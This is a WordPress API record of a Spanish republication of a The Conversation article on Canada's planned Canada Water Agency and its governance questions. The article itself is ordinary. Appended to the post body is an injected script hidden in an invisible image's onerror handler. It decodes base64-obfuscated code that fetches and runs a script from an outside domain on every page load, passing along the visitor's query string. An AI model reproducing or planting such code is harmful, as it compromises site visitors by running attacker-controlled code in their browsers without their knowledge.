{"id":5238,"date":"2022-05-06T10:25:43","date_gmt":"2022-05-06T13:25:43","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5238"},"modified":"2025-08-13T16:20:27","modified_gmt":"2025-08-13T19:20:27","slug":"canada-posee-el-20-de-las-reservas-mundiales-de-agua-dulce-asi-es-como-debe-administrar-este-precioso-recurso","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5238","title":{"rendered":"Canad\u00e1 posee el 20% de las reservas mundiales de agua dulce. As\u00ed es como debe administrar este precioso recurso"},"content":{"rendered":"\n<h6 class=\"has-text-align-left has-black-background-color has-background wp-block-heading\"><em><strong><a href=\"https:\/\/theconversation.com\/profiles\/alexandre-lillo-1002789\" target=\"_blank\" rel=\"noreferrer noopener\">Alexandre Lillo<\/a>,\u00a0<a href=\"https:\/\/theconversation.com\/institutions\/luniversite-dottawa-university-of-ottawa-1165\" target=\"_blank\" rel=\"noreferrer noopener\">Universidad de Ottawa\/Universidad de Ottawa<\/a>;\u00a0<a href=\"https:\/\/theconversation.com\/profiles\/eric-champagne-1117631\" target=\"_blank\" rel=\"noreferrer noopener\">Eric Champagne<\/a>,\u00a0<a href=\"https:\/\/theconversation.com\/institutions\/luniversite-dottawa-university-of-ottawa-1165\" target=\"_blank\" rel=\"noreferrer noopener\">Universidad de Ottawa\/Universidad de Ottawa<\/a>;\u00a0<a href=\"https:\/\/theconversation.com\/profiles\/lauren-touchant-1222603\" target=\"_blank\" rel=\"noreferrer noopener\">Lauren Touchant<\/a>,\u00a0<a href=\"https:\/\/theconversation.com\/institutions\/luniversite-dottawa-university-of-ottawa-1165\" target=\"_blank\" rel=\"noreferrer noopener\">Universidad de Ottawa\/Universidad de Ottawa<\/a>;\u00a0<a href=\"https:\/\/theconversation.com\/profiles\/marie-france-fortin-1222602\" target=\"_blank\" rel=\"noreferrer noopener\">Marie-France Fortin<\/a>,\u00a0<a href=\"https:\/\/theconversation.com\/institutions\/luniversite-dottawa-university-of-ottawa-1165\" target=\"_blank\" rel=\"noreferrer noopener\">Universidad de Ottawa\/Universidad de Ottawa<\/a>\u00a0y\u00a0<a href=\"https:\/\/theconversation.com\/profiles\/thomas-burelli-449446\">Thomas Burelli<\/a>,\u00a0<a href=\"https:\/\/theconversation.com\/institutions\/luniversite-dottawa-university-of-ottawa-1165\" target=\"_blank\" rel=\"noreferrer noopener\">Universidad de Ottawa\/Universidad de Ottawa<\/a><\/strong><\/em><\/h6>\n\n\n\n<p>Desde 2020, el gobierno federal ha emprendido la creaci\u00f3n de una Agencia Canadiense del Agua para supervisar la gobernanza del agua en Canad\u00e1.&nbsp;<a href=\"https:\/\/www.canada.ca\/fr\/environnement-changement-climatique\/organisation\/transparence\/consultations\/protection-eau-douce-canada.html\" target=\"_blank\" rel=\"noreferrer noopener\">La consulta p\u00fablica finaliz\u00f3 el 1 de marzo<\/a>, mientras que el compromiso ind\u00edgena continuar\u00e1 a lo largo de 2021.<\/p>\n\n\n\n<p>Pero quedan muchas preguntas y expectativas sobre la naturaleza de esta iniciativa.<\/p>\n\n\n\n<p>La gobernanza del agua abarca todos los procesos administrativos, sociales, pol\u00edticos, econ\u00f3micos o legales puestos en marcha desde una perspectiva de gesti\u00f3n del agua. En otras palabras, es el proceso social el que determina c\u00f3mo los actores gubernamentales y no gubernamentales desarrollan y toman decisiones sobre las medidas.<\/p>\n\n\n\n<p>Los actores gubernamentales participan a trav\u00e9s de sus responsabilidades compartidas con respecto al agua, mientras que los actores no gubernamentales participan debido a sus intereses en el recurso.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">La urgencia de actuar<\/h2>\n\n\n\n<p>Si bien&nbsp;<a href=\"https:\/\/ici.radio-canada.ca\/nouvelle\/1098859\/ressources-eau-monde-stress-hydrique-monde\" target=\"_blank\" rel=\"noreferrer noopener\">la demanda mundial de agua dulce aumenta constantemente<\/a>, Canad\u00e1 puede parecer privilegiado, con&nbsp;<a href=\"https:\/\/www150.statcan.gc.ca\/n1\/fr\/pub\/16-201-x\/16-201-x2010000-fra.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">el 20% de las reservas mundiales de agua dulce<\/a>&nbsp;y el&nbsp;<a href=\"https:\/\/www.rncan.gc.ca\/eau\/16889\" target=\"_blank\" rel=\"noreferrer noopener\">9% de los recursos renovables de agua dulce<\/a>.<\/p>\n\n\n\n<p>Sin embargo, muchos problemas caracterizan la urgencia de actuar sobre la gobernanza del agua dulce en Canad\u00e1: el calentamiento del clima en Canad\u00e1, que, m\u00e1s r\u00e1pido que en otros lugares, tiene&nbsp;<a href=\"https:\/\/ici.radio-canada.ca\/nouvelle\/1132308\/consequences-changement-climatique-au-canada-environnement\" target=\"_blank\" rel=\"noreferrer noopener\">consecuencias ambientales pronunciadas<\/a>,&nbsp;<a href=\"https:\/\/www.oag-bvg.gc.ca\/internet\/Francais\/parl_oag_202102_03_f_43749.html\" target=\"_blank\" rel=\"noreferrer noopener\">el acceso al agua potable en las comunidades ind\u00edgenas<\/a>&nbsp;y&nbsp;<a href=\"https:\/\/theconversation.com\/inondations-au-quebec-qui-paie-pour-quoi-et-comment-157756\" target=\"_blank\" rel=\"noreferrer noopener\">las pol\u00edticas de inundaciones<\/a>. Todas estas cuestiones contribuyen a&nbsp;<a href=\"https:\/\/www.canada.ca\/fr\/environnement-changement-climatique\/nouvelles\/2020\/12\/le-gouvernement-du-canada-lance-des-consultations-sur-la-nouvelle-agence-canadienne-de-leau.html\" target=\"_blank\" rel=\"noreferrer noopener\">justificar la creaci\u00f3n de una Agencia Canadiense del Agua.<\/a><\/p>\n\n\n\n<p>Tras la publicaci\u00f3n en diciembre de 2020&nbsp;<a href=\"https:\/\/www.placespeak.com\/uploads\/6321\/Agence_canadienne_de_l%E2%80%99eau_Document_de_discussion.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">de un documento de debate<\/a>&nbsp;sobre la futura Agencia por parte de Environment and Climate Change Canada, se llev\u00f3 a cabo una consulta p\u00fablica a trav\u00e9s de&nbsp;<a href=\"https:\/\/gwf.usask.ca\/events\/2021\/01\/national-freshwater-policy-forum.php\" target=\"_blank\" rel=\"noreferrer noopener\">foros nacionales y regionales<\/a>&nbsp;celebrados virtualmente en enero y febrero de 2021: el&nbsp;<a href=\"https:\/\/www.placespeak.com\/fr\/topic\/6321-la-protection-de-leau-douce-au-canada\/\" target=\"_blank\" rel=\"noreferrer noopener\">compromiso de los pueblos ind\u00edgenas<\/a>&nbsp;a\u00fan est\u00e1 en curso. Las v\u00edas de reflexi\u00f3n que se han propuesto son diversas, pero a veces siguen siendo muy vagas.<\/p>\n\n\n\n<p>Somos miembros\u00a0<a href=\"https:\/\/www.uottawa.ca\/gazette\/en\/news\/smart-changes-better-world-transforming-ai-water-governance-and-human-rights-policy\" target=\"_blank\" rel=\"noreferrer noopener\">del Foro de Derecho y Gobernanza de Aguas de la Universidad de Ottawa<\/a>, una red de investigaci\u00f3n formada por varios centros de estudio. Como parte de esta iniciativa interdisciplinaria, hemos identificado una serie de cuestiones legales y de gobernanza para la futura Agencia Canadiense del Agua.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Conference - &quot;An Interdisciplinary Perspective on the Future Canada Water Agency&quot;\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/5J3DrVU_c_g?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>El 22 de marzo de 2021 se celebr\u00f3 una conferencia interdisciplinaria sobre los desaf\u00edos de la futura Agencia Canadiense del Agua.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Impugnaciones legales<\/h2>\n\n\n\n<p>La ley de aguas canadiense se caracteriza por fuertes problemas interjurisdiccionales y una importante falta de coordinaci\u00f3n entre los actores gubernamentales. Frente a estas especificidades, se han formulado muchas propuestas de cambio.<\/p>\n\n\n\n<p>Por un lado, existen debates sobre&nbsp;<a href=\"https:\/\/youtu.be\/5J3DrVU_c_g?t=3454\" target=\"_blank\" rel=\"noreferrer noopener\">posibles esfuerzos de cooperaci\u00f3n<\/a>&nbsp;a la luz de la divisi\u00f3n constitucional de competencias y sobre el impacto de la jurisprudencia reciente en el federalismo cooperativo. Por otro lado, ha habido llamados a&nbsp;<a href=\"https:\/\/poliswaterproject.org\/files\/2019\/04\/WaterSecurityForCanada_April-25-2019-1.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">reformar&nbsp;<em>la Ley de Agua de Canad\u00e1<\/em><\/a>&nbsp;para&nbsp;<a href=\"https:\/\/ruor.uottawa.ca\/handle\/10393\/41080?locale=fr\" target=\"_blank\" rel=\"noreferrer noopener\">repensar la gobernanza del agua dulce por parte de las cuencas hidrogr\u00e1ficas<\/a>.<\/p>\n\n\n\n<p>Adem\u00e1s, se fomenta una colaboraci\u00f3n m\u00e1s integrada de los diversos actores, gubernamentales o no. Finalmente, a veces se aboga por un cambio de paradigma completo, enfatizando el agua como un ser espiritual que da (y toma) vida desde&nbsp;<a href=\"http:\/\/decolonizingwater.ca\/2018\/01\/18\/prof-aimee-craft-indigenous-peoples-and-access-to-water\/\" target=\"_blank\" rel=\"noreferrer noopener\">una perspectiva ind\u00edgena<\/a>. Ya no hay duda: las soluciones legales est\u00e1n llegando.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Cuestiones pol\u00edticas<\/h2>\n\n\n\n<p>La creaci\u00f3n de la Agencia Canadiense del Agua debe abordar la&nbsp;<a href=\"https:\/\/www.tandfonline.com\/doi\/abs\/10.1080\/07900627.2011.564969\" target=\"_blank\" rel=\"noreferrer noopener\">fragmentaci\u00f3n de la gobernanza del agua<\/a>,&nbsp;<a href=\"https:\/\/read.oecd-ilibrary.org\/environment\/water-governance-in-oecd-countries\/canada_9789264119284-11-en#page1\" target=\"_blank\" rel=\"noreferrer noopener\">los problemas de gobernanza multinivel<\/a>&nbsp;y&nbsp;<a href=\"https:\/\/www.canada.ca\/fr\/environnement-changement-climatique\/services\/eau-apercu\/legislation-gouvernance\/responsabilite-partagee.html\" target=\"_blank\" rel=\"noreferrer noopener\">las especificidades del federalismo canadiense<\/a>.<\/p>\n\n\n\n<p>Sin embargo, su creaci\u00f3n no solo ser\u00eda la culminaci\u00f3n de un renovado inter\u00e9s pol\u00edtico&nbsp;<a href=\"https:\/\/ici.radio-canada.ca\/nouvelle\/1703289\/walkerton-e-coli-ontario-eau-potable-20-ans\" target=\"_blank\" rel=\"noreferrer noopener\">tras la crisis de Walkerton en 2000<\/a>&nbsp;(el agua del municipio estaba contaminada con e-coli), sino tambi\u00e9n una oportunidad para revitalizar&nbsp;<a href=\"http:\/\/publications.gc.ca\/collections\/collection_2014\/ec\/En4-247-1987-fra.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">la pol\u00edtica federal del agua<\/a>, que ha ca\u00eddo gradualmente en el olvido desde 1987.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">El papel de los municipios<\/h2>\n\n\n\n<p>Si bien el entorno institucional y las relaciones de poder que caracterizan la gobernanza del agua en Canad\u00e1 son&nbsp;<a href=\"https:\/\/www.academia.edu\/35438225\/La_gouvernance_de_l_eau_au_Canada_Un_regard_juridique_et_%C3%A9pist%C3%A9mologique_sur_l_%C3%A9minente_complexit%C3%A9_de_sa_mise_%C5%93uvre\" target=\"_blank\" rel=\"noreferrer noopener\">complejos<\/a>, la futura Agencia Canadiense del Agua podr\u00eda<a href=\"https:\/\/www.placespeak.com\/uploads\/6321\/Agence_canadienne_de_l%E2%80%99eau_Document_de_discussion.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">, sin embargo, promover la producci\u00f3n y el intercambio de conocimientos, as\u00ed como la participaci\u00f3n ciudadana<\/a>.<\/p>\n\n\n\n<p>Los municipios, que desempe\u00f1an un papel fundamental&nbsp;<a href=\"https:\/\/www.amo.on.ca\/advocacy\/energy-environment-planning\/municipal-role-environment-protection#:%7E:text=Municipal%20investment%20in%20sewer%20systems,are%20needed%20to%20protect%20communities.\" target=\"_blank\" rel=\"noreferrer noopener\">en t\u00e9rminos de infraestructura o en la protecci\u00f3n de los ecosistemas acu\u00e1ticos, tambi\u00e9n podr\u00edan<\/a>&nbsp;ser reconocidos como actores clave en la gobernanza del agua canadiense dentro de la Agencia. Esta ser\u00eda una oportunidad&nbsp;<a href=\"http:\/\/hdl.handle.net\/10393\/41751\" target=\"_blank\" rel=\"noreferrer noopener\">para modernizar el marco para las relaciones federales-municipales en Canad\u00e1<\/a>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Consideraciones sectoriales<\/h2>\n\n\n\n<p>A pesar de un movimiento para&nbsp;<a href=\"https:\/\/www.routledge.com\/Integrated-Water-Management-in-Canada-The-Experience-of-Watershed-Agencies\/Shrubsole-Walters-Veale-Mitchell\/p\/book\/9780367588991\" target=\"_blank\" rel=\"noreferrer noopener\">integrar<\/a>&nbsp;y&nbsp;<a href=\"https:\/\/www.tandfonline.com\/doi\/abs\/10.4296\/cwrj3304315\" target=\"_blank\" rel=\"noreferrer noopener\">armonizar<\/a>&nbsp;la gesti\u00f3n del agua, ciertas consideraciones sectoriales siguen siendo esenciales para reflejar la diversidad de din\u00e1micas en torno al agua.<\/p>\n\n\n\n<p>Varios organismos de gesti\u00f3n del agua, como la&nbsp;<a href=\"http:\/\/www.lwcb.ca\/\" target=\"_blank\" rel=\"noreferrer noopener\">Junta de Control del Lago de los Bosques<\/a>&nbsp;o la&nbsp;<a href=\"https:\/\/www.ijc.org\/fr\" target=\"_blank\" rel=\"noreferrer noopener\">Comisi\u00f3n Mixta Internacional<\/a>, han estado tratando durante varios a\u00f1os de tener en cuenta las especificidades territoriales y ambientales. Estas estructuras establecen objetivos espec\u00edficos para el contexto territorial o ecosist\u00e9mico en el que operan.<\/p>\n\n\n\n<p>Tener en cuenta la diversidad de din\u00e1micas sociales en torno al agua tambi\u00e9n es esencial. Se trata de tener en cuenta las especificidades que puede generar, por ejemplo, el sector&nbsp;<a href=\"https:\/\/cca-reports.ca\/wp-content\/uploads\/2018\/10\/wag_fullreporten.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">agr\u00edcola<\/a>&nbsp;o&nbsp;<a href=\"https:\/\/theconversation.com\/climate-change-pollution-and-urbanization-threaten-water-in-canada-127876\" target=\"_blank\" rel=\"noreferrer noopener\">sanitario<\/a>, ya sea en lo que respecta a las necesidades de agua, los impactos sobre el agua, el acceso al agua o cuestiones relacionadas con la justicia ambiental.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Modelos relevantes en otros lugares<\/h2>\n\n\n\n<p>Si bien la creaci\u00f3n de una Agencia Canadiense del Agua es una iniciativa nacional, abordar las perspectivas internacionales relacionadas con este proyecto no carece de inter\u00e9s por al menos tres razones:<\/p>\n\n\n\n<p>1) La iniciativa canadiense es una oportunidad para cuestionar, incluso cuestionar<a href=\"http:\/\/regardssurlaterre.com\/les-paradoxes-de-la-souverainete\" target=\"_blank\" rel=\"noreferrer noopener\">, el imaginario de la soberan\u00eda nacional del agua<\/a>&nbsp;en la medida en que las cuestiones de gobernanza pueden ir mucho&nbsp;<a href=\"https:\/\/youtu.be\/5J3DrVU_c_g%C2%A0?t=8724\" target=\"_blank\" rel=\"noreferrer noopener\">m\u00e1s all\u00e1 de las fronteras del estado canadiense<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/images.theconversation.com\/files\/396144\/original\/file-20210420-23485-1e86l9b.jpg?ixlib=rb-1.1.0&amp;q=45&amp;auto=format&amp;w=754&amp;h=501&amp;fit=crop&amp;dpr=1\" alt=\"\" \/><\/figure>\n\n\n\n<p>En Nueva Zelandia, se ha concedido personalidad jur\u00eddica al r\u00edo Whanganui en un esfuerzo por reconciliar al Estado neozeland\u00e9s con el maor\u00ed.<br>Shutterstock<\/p>\n\n\n\n<p>2) Canad\u00e1 tambi\u00e9n tiene la oportunidad de aprender de varias experiencias extranjeras innovadoras. Este es el caso&nbsp;<a href=\"http:\/\/www.lesagencesdeleau.fr\/\" target=\"_blank\" rel=\"noreferrer noopener\">de las Agencias del Agua en Francia<\/a>, que han permitido el surgimiento de una forma&nbsp;<a href=\"http:\/\/www.lesagencesdeleau.fr\/les-agences-de-leau\/la-democratie-de-leau\/\" target=\"_blank\" rel=\"noreferrer noopener\">de democracia del agua<\/a>&nbsp;y son hoy actores esenciales en la protecci\u00f3n del medio ambiente. Este es tambi\u00e9n el caso de Nueva Zelandia, donde se ha concedido&nbsp;<a href=\"http:\/\/www.austlii.edu.au\/au\/journals\/AILRev\/2010\/22.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">personalidad jur\u00eddica<\/a>&nbsp;al&nbsp;<a href=\"https:\/\/www.visitwhanganui.nz\/whanganui-river\/\" target=\"_blank\" rel=\"noreferrer noopener\">r\u00edo Whanganui<\/a>&nbsp;en un esfuerzo por reconciliar al Estado neozeland\u00e9s con los&nbsp;<a href=\"https:\/\/onlinelibrary.wiley.com\/doi\/abs\/10.1002\/rra.3365\" target=\"_blank\" rel=\"noreferrer noopener\">maor\u00edes<\/a>.<\/p>\n\n\n\n<p>3) Finalmente, la&nbsp;<a href=\"https:\/\/youtu.be\/5J3DrVU_c_g%C2%A0?t=10996\" target=\"_blank\" rel=\"noreferrer noopener\">futura Agencia Canadiense del Agua ser\u00e1 examinada y estudiada m\u00e1s all\u00e1 de las fronteras de Canad\u00e1<\/a>, tendr\u00e1 implicaciones con las actividades de la&nbsp;<a href=\"https:\/\/www.ijc.org\/fr\" target=\"_blank\" rel=\"noreferrer noopener\">Comisi\u00f3n Conjunta Internacional<\/a>&nbsp;y alimentar\u00e1 las reflexiones internacionales en el campo de la gobernanza del agua.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">La importancia de los pr\u00f3ximos pasos<\/h2>\n\n\n\n<p>Las&nbsp;<a href=\"http:\/\/www.rbc.com\/community-sustainability\/_assets-custom\/pdf\/CWAS-2017-report.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">encuestas m\u00e1s recientes<\/a>&nbsp;todav\u00eda indican que el agua es el recurso natural prioritario para los canadienses. La comisionada Merrell-Ann Phare dijo en nuestra conferencia que \u00abla Agencia Canadiense del Agua tiene el potencial \u00fanico de ser una innovaci\u00f3n de gobernanza innovadora en Canad\u00e1\u00bb.<\/p>\n\n\n\n<p>Por lo tanto, los pr\u00f3ximos pasos ser\u00e1n decisivos. Medio Ambiente y Cambio Clim\u00e1tico Canad\u00e1 ahora debe preparar un&nbsp;<a href=\"https:\/\/www.placespeak.com\/fr\/topic\/6321-la-protection-de-leau-douce-au-canada\/#\/\" target=\"_blank\" rel=\"noreferrer noopener\">informe que incorpore los comentarios recibidos durante la consulta p\u00fablica<\/a>.<\/p>\n\n\n\n<p>El&nbsp;<a href=\"https:\/\/www.budget.gc.ca\/2021\/home-accueil-fr.html\" target=\"_blank\" rel=\"noreferrer noopener\">plan presupuestario federal 2021 presentado recientemente<\/a>&nbsp;proporciona&nbsp;<a href=\"https:\/\/www.budget.gc.ca\/2021\/report-rapport\/p2-fr.html\" target=\"_blank\" rel=\"noreferrer noopener\">$ 17.4 millones durante dos a\u00f1os para esta iniciativa, a partir de este a\u00f1o<\/a>. Si bien esta propuesta parece consolidar los compromisos del gobierno, las elecciones federales que podr\u00edan convocarse en el oto\u00f1o pueden alterar el cronograma propuesto.<\/p>\n\n\n\n<p><a href=\"https:\/\/theconversation.com\/profiles\/alexandre-lillo-1002789\" target=\"_blank\" rel=\"noreferrer noopener\">Alexandre Lillo<\/a>, becario postdoctoral,&nbsp;<em><a href=\"https:\/\/theconversation.com\/institutions\/luniversite-dottawa-university-of-ottawa-1165\" target=\"_blank\" rel=\"noreferrer noopener\">Universidad de Ottawa\/Universidad de Ottawa<\/a><\/em>;&nbsp;<a href=\"https:\/\/theconversation.com\/profiles\/eric-champagne-1117631\" target=\"_blank\" rel=\"noreferrer noopener\">Eric Champagne<\/a>, Profesor Asociado, Escuela de Estudios Pol\u00edticos, Director, Centro de Gobernanza,&nbsp;<em><a href=\"https:\/\/theconversation.com\/institutions\/luniversite-dottawa-university-of-ottawa-1165\" target=\"_blank\" rel=\"noreferrer noopener\">Universidad de Ottawa\/Universidad de Ottawa<\/a><\/em>;&nbsp;<a href=\"https:\/\/theconversation.com\/profiles\/lauren-touchant-1222603\" target=\"_blank\" rel=\"noreferrer noopener\">Lauren Touchant<\/a>, becaria postdoctoral,&nbsp;<em><a href=\"https:\/\/theconversation.com\/institutions\/luniversite-dottawa-university-of-ottawa-1165\" target=\"_blank\" rel=\"noreferrer noopener\">Universidad de Ottawa\/Universidad de Ottawa<\/a><\/em>;&nbsp;<a href=\"https:\/\/theconversation.com\/profiles\/marie-france-fortin-1222602\" target=\"_blank\" rel=\"noreferrer noopener\">Marie-France Fortin<\/a>, Profesora Asistente,&nbsp;<em><a href=\"https:\/\/theconversation.com\/institutions\/luniversite-dottawa-university-of-ottawa-1165\" target=\"_blank\" rel=\"noreferrer noopener\">Universidad de Ottawa\/Universidad de Ottawa<\/a><\/em>&nbsp;y&nbsp;<a href=\"https:\/\/theconversation.com\/profiles\/thomas-burelli-449446\" target=\"_blank\" rel=\"noreferrer noopener\">Thomas Burelli<\/a>, Profesor de Derecho, Secci\u00f3n de Derecho Civil, Universidad de Ottawa (Canad\u00e1), miembro del Consejo Cient\u00edfico de la Fundaci\u00f3n France Libert\u00e9s,&nbsp;<em><a href=\"https:\/\/theconversation.com\/institutions\/luniversite-dottawa-university-of-ottawa-1165\" target=\"_blank\" rel=\"noreferrer noopener\">Universidad de Ottawa\/Universidad de Ottawa<\/a><\/em><\/p>\n\n\n\n<p>Este art\u00edculo se ha vuelto a publicar de&nbsp;<a href=\"https:\/\/theconversation.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">The Conversation<\/a>&nbsp;bajo una licencia Creative Commons. Lea el&nbsp;<a href=\"https:\/\/theconversation.com\/le-canada-detient-20-des-reserves-mondiales-en-eau-douce-voici-comment-il-doit-gerer-cette-precieuse-ressource-158363\" target=\"_blank\" rel=\"noreferrer noopener\">art\u00edculo original<\/a>.<\/p>\n\n\n\n<p>\u00a9historias de im\u00e1genes destacadas (vista&nbsp;a\u00e9rea de las Islas de la Bah\u00eda de Georgia, Ontario, Canad\u00e1):&nbsp;Shutterstock.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized is-style-rounded\"><a href=\"https:\/\/www.aquae-officiel.fr\/2021\/05\/03\/le-canada-detient-20-des-reserves-mondiales-en-eau-douce-voici-comment-il-doit-gerer-cette-precieuse-ressource\/\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-5-2022_102329_www.aquae-officiel.fr_.jpeg\" alt=\"\" class=\"wp-image-5239\" width=\"188\" height=\"61\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-5-2022_102329_www.aquae-officiel.fr_.jpeg 398w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-5-2022_102329_www.aquae-officiel.fr_-300x97.jpeg 300w\" sizes=\"(max-width: 188px) 100vw, 188px\" \/><\/a><figcaption>Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Alexandre Lillo,\u00a0Universidad de Ottawa\/Universidad de Ottawa;\u00a0Eric Champagne,\u00a0Universidad de Ottawa\/Universidad de Ottawa;\u00a0Lauren Touchant,\u00a0Universidad de Ottawa\/Universidad de Ottawa;\u00a0Marie-France Fortin,\u00a0Universidad de Ottawa\/Universidad de Ottawa\u00a0y\u00a0Thomas Burelli,\u00a0Universidad de Ottawa\/Universidad de Ottawa Desde 2020, el gobierno federal ha emprendido la creaci\u00f3n de una Agencia Canadiense del Agua para supervisar la gobernanza del agua en Canad\u00e1.&nbsp;La consulta p\u00fablica finaliz\u00f3 el 1 de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5240,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[30],"tags":[],"class_list":["post-5238","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-temas-relacionados"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5238","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5238"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5238\/revisions"}],"predecessor-version":[{"id":10681,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5238\/revisions\/10681"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5240"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5238"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5238"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5238"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}